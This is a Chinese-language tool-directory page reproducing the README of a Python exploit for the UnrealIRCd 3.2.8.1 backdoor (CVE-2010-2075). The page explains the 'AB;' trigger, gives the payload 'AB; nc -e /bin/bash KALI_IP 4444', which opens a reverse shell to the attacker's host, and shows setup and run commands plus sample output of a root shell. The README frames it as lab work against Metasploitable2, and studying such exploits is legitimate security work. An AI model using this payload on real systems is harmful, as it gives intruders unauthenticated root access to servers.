Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2010-2075 — UnrealIRCd 3.2.8.1 后门漏洞利用 — 通过 AB 实现反向 shell;触发方式,使用 Python 从零构建,基于原始套接字。无需 Metasploit。 | Kitploit
工具/GitHubGitHub/rushikesh-a-bhujbal/cve-2010-2075
漏洞分析漏洞利用Web应用程序漏洞利用后渗透利用渗透测试供应链安全学习与教育红队Payload 开发实验室与实践
GitHubrushikesh-a-bhujbal/cve-2010-2075

CVE-2010-2075

110小时26分前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →

UnrealIRCd 3.2.8.1 后门漏洞利用 — 通过 AB 实现反向 shell;触发方式,使用 Python 从零构建,基于原始套接字。无需 Metasploit。

查看仓库
分享

CVE-2010-2075 — UnrealIRCd 3.2.8.1 后门漏洞利用

Python Platform Target License


概述

UnrealIRCd 是一款开源的 IRC(Internet Relay Chat,互联网中继聊天)服务器——一种允许用户通过网络进行实时通信的协议,类似于早期的聊天平台。

在 2009 至 2010 年间,人们发现通过官方下载镜像分发的 UnrealIRCd 3.2.8.1 已被植入后门。攻击者将合法源代码替换为包含隐藏命令执行触发器的后门版本。

这是一次供应链攻击——其性质与 CVE-2011-2523(vsftpd 2.3.4)完全相同。合法软件在用户下载之前就被替换为恶意修改的版本。


后门的工作原理

该后门会监控端口 6667 上的所有传入数据。如果任何输入以字符串 AB; 开头,其后的所有内容将被直接传递给 system()——完全绕过所有 IRC 逻辑、身份验证和注册检查。

该触发器在连接初始化阶段就会触发,甚至在 IRC 服务器注册客户端之前。无需 NICK、无需 USER、无需任何身份验证。

攻击流程:

root@kitploit:~
攻击者 (Kali)                       目标 (Metasploitable2)
                                   
1. s1 连接到端口 6667   
   NICK + USER 握手            →   服务器发送完整横幅
   读取横幅,检查版本  
   确认 Unreal3.2.8.1      
                                   
2. 在端口 4444 上打开监听器  
   (等待传入的 shell)
                                   
3. s2 连接到端口 6667         →    AB; nc -e /bin/bash KALI_IP 4444
                               →    system() 立即执行
                               →    netcat 生成 bash,回连
                                   
4. listener.accept()          ←    传入的 root shell 连接
   交互式 root shell      

反向 Shell 与绑定 Shell

此漏洞利用使用的是反向 shell——由目标主机回连攻击者,而非攻击者连接目标主机上的某个端口。

类型方向使用场景
绑定 Shell攻击者 → 目标CVE-2011-2523 (vsftpd)
反向 Shell目标 → 攻击者CVE-2010-2075 (UnrealIRCd)

反向 shell 可以绕过入站防火墙规则——来自目标主机的出站连接很少被阻止。


环境要求

  • Python 3.x
  • 无需外部库——仅使用标准库
  • 目标主机上已安装 netcat(Metasploitable2 默认自带)
  • 目标:运行 UnrealIRCd 3.2.8.1 的 Metasploitable2

使用方法

root@kitploit:~
git clone https://github.com/rushikesh-a-bhujbal/CVE-2010-2075.git
cd exploit-dev/CVE-2010-2075

编辑 main.py 并设置:

root@kitploit:~
kali_ip = "YOUR_KALI_IP"
target_ip = "TARGET_IP"

运行:

root@kitploit:~
python3 main.py

示例输出:

root@kitploit:~
[+] Vulnerable version confirmed. Proceeding...
[*] Listening on port 4444...
[+] Shell received from ('192.168.15.132', 58280)
> whoami
root
> uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008
> pwd
/etc/unreal
> exit

错误处理

场景行为
端口 6667 已关闭打印 "Port Closed",正常退出
版本错误打印 "Not vulnerable",正常退出
目标未回连listener.accept() 持续等待(如有需要可添加超时)
命令无输出recv() 静默超时,返回提示符

与 CVE-2011-2523 的关键区别

CVE-2011-2523 (vsftpd)CVE-2010-2075 (UnrealIRCd)
协议FTP(端口 21)IRC(端口 6667)
触发器用户名中的 :)任意输入以 AB; 为前缀
Shell 类型绑定 Shell(端口 6200)反向 Shell(攻击者的端口)
连接数2 个出站1 个出站 + 1 个入站

测试环境

  • Metasploitable2(故意存在漏洞的虚拟机)
  • UnrealIRCd 3.2.8.1
  • Linux metasploitable 2.6.24-16-server

法律免责声明

此漏洞利用程序严格出于教育目的以及经授权的安全研究而开发。

仅在完全隔离的实验环境中,针对本地 Metasploitable2 虚拟机进行构建和测试。

请勿将此程序用于任何您不拥有或未获得明确书面测试许可的系统。未经授权的使用根据《计算机欺诈与滥用法案》(CFAA) 及全球同等法律均属违法行为。

作者对此代码的滥用不承担任何责任。


参考资料

  • CVE 记录:https://www.cve.org/CVERecord?id=CVE-2010-2075
  • NVD 条目:https://nvd.nist.gov/vuln/detail/CVE-2010-2075
  • 原始披露:https://www.exploit-db.com/exploits/13853
  • Metasploitable2:https://sourceforge.net/projects/metasploitable/

作者

Rushikesh Bhujbal
安全研究与漏洞利用开发
GitHub

下载工具